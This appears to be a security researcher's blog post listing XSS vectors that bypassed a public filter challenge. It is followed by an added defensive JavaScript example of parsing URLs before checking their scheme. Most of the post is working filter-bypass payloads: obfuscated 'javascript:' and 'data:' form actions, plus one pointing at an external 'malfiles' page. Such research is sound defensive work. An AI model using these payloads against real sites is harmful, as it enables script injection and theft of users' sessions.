- Yesterday I tweeted about the winner of the XSS Challenge (http://demo.chm-software.com/xssfilter/), and below you will find some more "awesome vectors submitted by different researchers" that got second, third position and so on ... The challenge is up and running, and if you find something new ... let me know (@soaj1664ashar). You will get something in the form of a prize :-)
- 1st Position vector by a great person @avlidienbrunn and the vector is:
- -------------------------------------------------------
- <isindex action="javas	cript:alert(1)" type=image>
- and here is the example fiddle: http://jsfiddle.net/X7hdq/
- I have already tweeted about that here: https://twitter.com/soaj1664ashar/status/323847687755665409
- 2nd Position vectors submitted by an XSS Guru i.e., Mario (@0x6D6172696F).
- ---------------------------------------------------------------------
- In fact, Mario has sent me TWO vectors and they are:
- a) <form action='data:text/html,<script>alert(1)</script>'><button>CLICK
- here is the example fiddle for this: http://jsfiddle.net/6DTSp/
- b) <form action='java	scri	pt:alert(1)'><button>CLICK
- here is the working fiddle of this vector: http://jsfiddle.net/dPrHG/
- 3rd Position vector submitted by a cool guy i.e., @secalert
- --------------------------------------------------------
- <form id="myform" value=""
- action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input
- type="submit" value="Absenden"></form>
- and here is the running fiddle: http://jsfiddle.net/HMH9k/
- and in `NO` particular order ... I have also received the following VALID vectors from awesome PWNERS :)
- ---------------------------------------------------------------------------------------------------------
- <isindex action=http://jkuskos.com/malfiles/jdk.html type=image> by @JohnathanKuskos
- <form action="	javas	cript	:alert('bypass :)')"
- autocomplete="on">
- First name:<input type="text" name="fname"><br>
- <input type="submit">
- </form> by @insertScript
- <form action=javascript
:alert(7)><input type=submit> by @Milad_Bahari
- <form action="javas	cript:alert(1)" method="get">
- <input type="submit" value="Submit">
- </form> by @_hlipinski
- FYI, I hope the above vectors will not work now .... :) #figureoutyourself
- At the same time ... I also have the biggest POOL of XSS vectors that people use here and there to break different filters. I will write in detail about that data in the near future. This post is just to show the awesome vectors that are able to bypass the filter. I hope you guys have learned something, and I have learnt a lot. I have also seen your "frustration" in the LOGS and it is really fun to watch logs :-). The challenge is online. Keep trying and figure out how you can break the filter.
- Stay Blessed!
- @soaj1664ashar
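
For filter authors, an added example (not part of the original post and not the challenge's filter): most of the `action` values above only become `javascript:` once the browser's URL parser strips tabs and newlines, so a prefix match on the raw attribute misses them, while parsing first does not. The base URL, `naiveIsSafe`, `isSafeAction` and the two non-script samples are assumptions made for this illustration.

```javascript
// Added example, not from the original post. Action values are the ones
// quoted above, as they look after HTML attribute parsing; the base URL and
// the last two samples are constructed.
const BASE = "https://app.example.test/form"; // assumed URL of the page

// Hypothetical naive filter: matches a literal scheme prefix on raw input.
function naiveIsSafe(action) {
  return !/^\s*(javascript|data):/i.test(action);
}

// Parse with the WHATWG URL parser first. It strips leading/trailing C0
// controls and spaces and removes every ASCII tab and newline, so the check
// sees the same scheme the browser will act on.
function isSafeAction(action, base = BASE) {
  let url;
  try {
    url = new URL(action, base);
  } catch {
    return false; // unparseable input is rejected
  }
  const httpLike = url.protocol === "https:" || url.protocol === "http:";
  // Also pin the origin: an external http(s) action passes a scheme check.
  return httpLike && url.origin === new URL(base).origin;
}

const samples = [
  "javas\tcript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "java\tscri\tpt:alert(1)",
  "\tjavas\tcript\t:alert('bypass :)')",
  "javascript\n:alert(7)",
  "http://other.example.test/x.html", // constructed external action
  "/search?q=1", // constructed benign relative action
];

// One row per sample: what each check decides.
function report() {
  return samples.map((s) => ({
    action: JSON.stringify(s),
    naive: naiveIsSafe(s),
    parsed: isSafeAction(s),
  }));
}

console.table(report());
```

Only the relative `/search?q=1` action is accepted by `isSafeAction`; the naive check accepts every sample except the plain `data:` one.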